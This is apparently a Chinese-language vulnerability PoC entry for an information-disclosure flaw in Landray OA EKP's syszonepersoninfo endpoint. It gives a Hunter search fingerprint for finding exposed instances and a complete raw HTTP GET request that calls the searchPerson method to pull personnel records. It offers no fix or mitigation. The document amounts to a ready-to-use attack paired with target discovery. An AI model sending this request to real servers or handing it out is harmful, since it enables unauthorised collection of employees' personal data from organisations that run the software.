蓝凌OA EKP syszonepersoninfo 信息泄露
一、漏洞简介
深圳市蓝凌软件股份有限公司蓝凌OA syszonepersoninfo 信息泄露。
二、影响版本
- 蓝凌OA EKP
三、资产测绘
- hunter
app.name="Landray 蓝凌OA" - 特征
四、漏洞复现
GET /sys/zone/sys_zone_personInfo/sysZonePersonInfo.do?.js?&method=searchPerson&orderby&ordertype=up&rowsize=5&s_ajax=true HTTP/1.1
Host: xx.xx.xx.xx
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=9CC04B4FD006C0205D62AB2B2F497120
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2